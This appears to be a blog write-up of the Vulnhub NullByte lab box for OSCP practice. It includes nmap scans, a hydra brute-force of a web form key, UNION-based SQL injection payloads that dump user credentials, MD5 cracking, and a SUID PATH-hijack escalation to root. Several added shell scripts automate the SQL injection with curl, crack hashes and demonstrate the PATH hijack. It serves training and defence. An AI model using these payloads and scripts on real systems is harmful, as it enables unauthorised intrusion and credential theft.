PG Play/Vulnhub | NullByte — WriteUp

Mandoy
6 min read · Jun 3, 2021

Box 3/40

My third writeup for OSCP preparation.

RECONNAISSANCE

Also called the information-gathering phase: the goal is to collect as much information about the target as possible before interacting with any service in depth.

I start with a fast full-port SYN scan: nmap -p- -sS -Pn -n -T4 --min-rate=3000 $RHOST (all 65535 TCP ports, no host discovery, no DNS resolution, aggressive timing). Nmap found the following open ports:

sudo nmap -p- -sS -Pn -n -T4 --min-rate=3000 192.168.203.16

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-01 11:56 EDT
Warning: 192.168.69.16 giving up on port because retransmission cap hit (6).
Nmap scan report for 192.168.203.16
Host is up (0.24s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
777/tcp   open  multiling-http
33872/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 27.20 seconds

Next, a detailed scan of just the open ports with default scripts (-sC), version detection (-sV) and OS fingerprinting (-O). This is the valuable part for an attacker: exact service versions and banners turn a bare list of ports into concrete attack vectors.

sudo nmap -p80,111,777,33872 -sC -sV -O -Pn -n 192.168.203.16

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-01 11:57 EDT
Nmap scan report for 192.168.203.16
Host is up (0.24s latency).
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Null Byte 00 - level 1
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version port/proto  service
|   100000  2,3,4   111/tcp     rpcbind
|   100000  2,3,4   111/udp     rpcbind
|   100000  3,4     111/tcp6    rpcbind
|   100000  3,4     111/udp6    rpcbind
|   100024  1       33323/udp   status
|   100024  1       33872/tcp   status
|   100024  1       43582/udp6  status
|_  100024  1       57223/tcp6  status
777/tcp   open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
|   2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
|   256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
|_  256 bc:f7:44:8d:79:6a:19:48:76:a3:e2:44:92:dc:13:a2 (ED25519)
33872/tcp open  status  1 (RPC #100024)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (95%), Linux 3.11 - 4.1 (94%), Linux 3.16 (94%), Linux 4.4 (93%), Linux 3.13 (91%), Linux 3.10 - 4.11 (90%), Linux 3.13 or 4.2 (90%), Linux 3.2 - 4.9 (90%), Linux 4.2 (90%), Linux 4.8 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.31 seconds

ENUMERATION

Enumeration is the process of extracting user names, machine names, network resources, shares and services from a system. In this phase the attacker makes active connections to the target and sends directed queries to learn more about it.

PORT 80 — HTTP

Browse to http://192.168.203.16

Checking for hidden directories (directory brute force) turned up nothing interesting.

Next I checked whether the image on the page hides anything. I downloaded it and ran exiftool against it: the Comment field contains an interesting string. That could be an SSH password or the name of a hidden directory.

Browse to http://192.168.203.16/kzMb5nVYJw

View the page source. The directory serves a form that POSTs a key parameter to index.php and answers a wrong guess with "invalid key", which is exactly what a brute-force tool needs as its failure condition.

I brute-forced the key parameter with hydra and the rockyou.txt wordlist; it found the key "elite":

hydra -l a -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt 192.168.203.16 http-post-form "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -V -f -t 4

(-l a supplies the dummy username that hydra's http-post-form module insists on even though the form has no user field; -f stops at the first valid key; -t 4 keeps the request rate modest.)

Entering any word in the username box returns the message "fetch data successfully".

Appending a double quote (") to the input, either in the username box or directly in the usrtosearch parameter, changes the response: the quote closes the string literal in the underlying query and breaks it, which tells me the input is inserted unescaped into SQL. The parameter is vulnerable to SQL injection.

EXPLOITATION

This is the phase where the attacker or pentester actually breaks in and gains access to the system.

SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application’s content or behavior.

First, find the number of columns the original query returns, so that a UNION SELECT can be appended to it. Keep adding null fields to the payload until the application stops erroring and returns a valid result; the trailing -- - comments out whatever the application appends after the injection point.

AnyWord" UNION SELECT null, null, null; -- -

I used the MySQL cheat sheet from https://github.com/acole76/pentestmonkey-cheatsheets/blob/master/mysql.md for the information_schema queries that dump the database.

Enumerate all databases. The result listed five databases:

AnyWord" UNION SELECT null, schema_name, null FROM information_schema.schemata; -- -

Enumerate the tables of the seth database with the same pattern (table_name from information_schema.tables, filtered on table_schema). There is a single table, users.

Enumerate the columns of the users table:

AnyWord" UNION SELECT null, column_name, null FROM information_schema.columns WHERE table_schema="seth" AND table_name="users"; -- -

Dump the interesting columns:

AnyWord" UNION SELECT null, Concat(user, ":", pass), null FROM users; -- -
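The enumeration chain above, automated from the shell with curl, as an added example that is not part of the original writeup. It goes beyond the page in two ways: the payload builder works for any column count and any reflected column, and the final dump is schema-qualified (seth.users) so it works whatever the application's default database is. Three things are assumptions, not taken from the page: the search page's URL, that usrtosearch arrives as a GET parameter, and the word "error" as the marker of a broken query in the column-count probe. Adjust TARGET and ERROR_RE to the application.

```shell
#!/bin/sh
# Added example, not from the original post: the UNION-based enumeration chain
# from the writeup, driven with curl. Assumptions (not on the page): the search
# page URL below, that usrtosearch is a GET parameter, and the word "error" as
# the marker of a broken query. Change TARGET/ERROR_RE to fit the application.

TARGET=${TARGET:-"http://192.168.203.16/kzMb5nVYJw/search.php"}  # assumed path
COLS=${COLS:-3}                # column count found with the null probe on this box
REFLECT=${REFLECT:-2}          # 1-based index of the column the page displays
ERROR_RE=${ERROR_RE:-"error"}  # assumed: text that appears when the query breaks

# Build one payload: $1 columns, expression $3 in column $2, null elsewhere,
# optional "FROM ..." tail in $4 (empty for the column-count probe).
union_payload() {
    cols=$1 reflect=$2 field_expr=$3 from=$4
    sel="" i=1
    while [ "$i" -le "$cols" ]; do
        if [ "$i" -eq "$reflect" ]; then field=$field_expr; else field=null; fi
        if [ -z "$sel" ]; then sel=$field; else sel="$sel, $field"; fi
        i=$((i + 1))
    done
    if [ -n "$from" ]; then
        printf 'AnyWord" UNION SELECT %s FROM %s; -- -' "$sel" "$from"
    else
        printf 'AnyWord" UNION SELECT %s; -- -' "$sel"
    fi
}

# The four enumeration steps. The dump is schema-qualified (seth.users) so it
# works even when the application's default database is another one.
payload_schemas() { union_payload "$COLS" "$REFLECT" schema_name information_schema.schemata; }
payload_tables()  { union_payload "$COLS" "$REFLECT" table_name "information_schema.tables WHERE table_schema=\"$1\""; }
payload_columns() { union_payload "$COLS" "$REFLECT" column_name "information_schema.columns WHERE table_schema=\"$1\" AND table_name=\"$2\""; }
payload_dump()    { union_payload "$COLS" "$REFLECT" "Concat($3, \":\", $4)" "$1.$2"; }

# Send a payload; curl URL-encodes the quotes, spaces and semicolon for us.
send() { curl -s -G --data-urlencode "usrtosearch=$1" "$TARGET"; }

# Column-count probe: add nulls until the response no longer shows the error marker.
probe_columns() {
    n=1
    while [ "$n" -le 12 ]; do
        if ! send "$(union_payload "$n" 1 null "")" | grep -qi "$ERROR_RE"; then
            echo "$n"; return 0
        fi
        n=$((n + 1))
    done
    return 1
}

# Whole chain: ./sqli.sh dump <schema> <table> <usercol> <passcol>
main() {
    for p in "$(payload_schemas)" "$(payload_tables "$1")" \
             "$(payload_columns "$1" "$2")" "$(payload_dump "$1" "$2" "$3" "$4")"; do
        printf '### %s\n' "$p"
        send "$p"
        echo
    done
}

case ${1:-} in
    probe) probe_columns ;;            # prints the column count, e.g. 3
    dump)  shift; main "$@" ;;         # e.g. ./sqli.sh dump seth users user pass
esac
```

Run ./sqli.sh probe first and export COLS accordingly, then ./sqli.sh dump seth users user pass; each step prints the raw response, and the reflected column carries the extracted value.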

The dump returns the username ramses and a password that looks base64-encoded. Decoding it yields 32 hex characters, i.e. what looks like an MD5 hash. (Note that the value as quoted here is missing its trailing = padding; some decoders reject it unless you add that back.)

echo "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE" | base64 -d

Cracking the MD5 hash gives the password 'omega'. Log in over SSH on port 777 as ramses:omega.
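The credential-recovery step above, scripted, as an added example that is not part of the original writeup. It restores the missing base64 padding before decoding, classifies the result by length (32 hex characters points at MD5), and runs a small dictionary attack with the matching coreutils digest tool. The wordlist is constructed inline for the example; in practice you would point it at rockyou.txt or a lookup service.

```shell
#!/bin/sh
# Added example, not from the original post: turn the dumped pass value into a
# login password. Restore base64 padding, identify the digest by its length,
# then run a dictionary attack with the matching *sum tool from coreutils.

# Re-add '=' padding (the value as quoted on the page is 43 chars, one short of
# a multiple of four) and decode.
b64_decode_padded() {
    s=$1
    while [ $(( ${#s} % 4 )) -ne 0 ]; do s="$s="; done
    printf '%s' "$s" | base64 -d
}

# Classify a hex digest by length: 32 = MD5, 40 = SHA-1, 64 = SHA-256.
hash_kind() {
    printf '%s' "$1" | grep -Eq '^[0-9a-fA-F]+$' || { echo unknown; return; }
    case ${#1} in
        32) echo md5 ;;
        40) echo sha1 ;;
        64) echo sha256 ;;
        *)  echo unknown ;;
    esac
}

# Dictionary attack: $1 = hex digest, $2 = wordlist (one candidate per line).
# Each word is hashed without a trailing newline, as cracking tools do, and
# the plaintext is printed on a match.
crack_hash() {
    digest=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    case $(hash_kind "$digest") in
        md5)    tool=md5sum ;;
        sha1)   tool=sha1sum ;;
        sha256) tool=sha256sum ;;
        *) echo "unsupported digest: $1" >&2; return 2 ;;
    esac
    while IFS= read -r word || [ -n "$word" ]; do
        if [ "$(printf '%s' "$word" | $tool | cut -d' ' -f1)" = "$digest" ]; then
            echo "$word"
            return 0
        fi
    done < "$2"
    return 1
}

# End to end: decode the stored value, then crack it. $1 = base64 text, $2 = wordlist.
recover_password() {
    h=$(b64_decode_padded "$1") || return 1
    echo "decoded: $h ($(hash_kind "$h"))" >&2
    crack_hash "$h" "$2"
}

# The value from the users dump, as quoted on the page.
STORED="YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE"

# Constructed wordlist for the example; use rockyou.txt or similar for real.
WORDLIST=$(mktemp)
trap 'rm -f "$WORDLIST"' EXIT
printf '%s\n' password 123456 letmein pharaoh omega qwerty > "$WORDLIST"

recover_password "$STORED" "$WORDLIST"   # prints: omega
```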

PRIVILEGE ESCALATION

Privilege escalation is the process of raising the privileges of the account you hold on a host, ideally all the way to root.

I escalated by abusing SUID/SGID permissions. SUID is a special permission bit on executable files that lets any user run the file with the effective privileges of the file's owner. In the permission string an s replaces the owner's x to indicate it.

SGID is the equivalent for the group: executables with it run with the effective GID of the file's group owner, and the s appears in place of the group's x.

If such a file is owned by root, it runs as root, and any way to influence what it executes is a route to root privileges.

To search for SUID/SGID files (-perm -u+s matches the SUID bit, -perm -g+s the SGID bit):

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

Among the results, procwatch stands out: it is a SUID binary that invokes sh and ps by bare name rather than by absolute path, so the command is resolved through the caller's $PATH. To escalate I need procwatch to execute a shell of my choosing where it expects ps.

Prepend /tmp to PATH so it is searched before the default directories:

export PATH=/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

Copy /bin/sh to /tmp under the name ps:

cp /bin/sh /tmp/ps

Run procwatch again: it now executes /tmp/ps, which is a shell running with the binary's elevated effective UID. It has to be /bin/sh (dash on Debian) rather than bash, because bash drops its effective privileges on startup when they differ from the real UID unless it is started with -p.
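The PATH-hijack mechanic behind this escalation, reproduced in a throwaway directory as an added example that is not part of the original writeup. The real procwatch is SUID and cannot be recreated without root, so a stand-in script plays its part: it calls ps by bare name, which is the weakness the page exploits (its exact shape is an assumption; the page only says the binary runs ps and sh). The fake ps prints a marker instead of spawning a shell so the effect is observable, and a hardened variant that resets PATH before resolving ps sits beside it to show the fix.

```shell
#!/bin/sh
# Added example, not from the original post: PATH hijack against a program
# that calls "ps" by bare name. Everything lives in a scratch directory and
# runs as the current user; on the box the same bug in a SUID binary is what
# turned it into a root shell.

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
mkdir "$WORK/fakebin"

# Stand-in for procwatch: resolves ps through the caller's PATH (assumed shape
# of the real binary, which the page only describes as running ps and sh).
cat > "$WORK/procwatch" <<'EOF'
#!/bin/sh
ps
EOF

# Hardened variant: pin PATH to trusted directories before resolving anything,
# so whatever the caller put first in PATH is ignored.
cat > "$WORK/procwatch_fixed" <<'EOF'
#!/bin/sh
PATH=/usr/bin:/bin
export PATH
ps
EOF

# Attacker's "ps": on the box this was a copy of /bin/sh; here it prints a
# marker so the hijack can be checked from a test.
cat > "$WORK/fakebin/ps" <<'EOF'
#!/bin/sh
echo "HIJACKED: fake ps running as $(id -un), PATH=$PATH"
EOF
chmod +x "$WORK/procwatch" "$WORK/procwatch_fixed" "$WORK/fakebin/ps"

# Run target $1 the way the writeup does: attacker directory first in PATH.
run_hijacked() {
    PATH="$WORK/fakebin:$PATH" "$WORK/$1" 2>&1
}

# Did the target execute our ps instead of the real one? Prints yes or no.
hijack_works() {
    if run_hijacked "$1" | grep -q '^HIJACKED'; then echo yes; else echo no; fi
}

hijack_works procwatch        # yes: the stand-in ran /tmp-style fake ps
hijack_works procwatch_fixed  # no: PATH was reset before lookup
```

The same applies to any privileged program, cron job or sudo rule that runs commands by bare name: the fix is an absolute path or a sanitised PATH set inside the program, never trusting what the caller exported.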
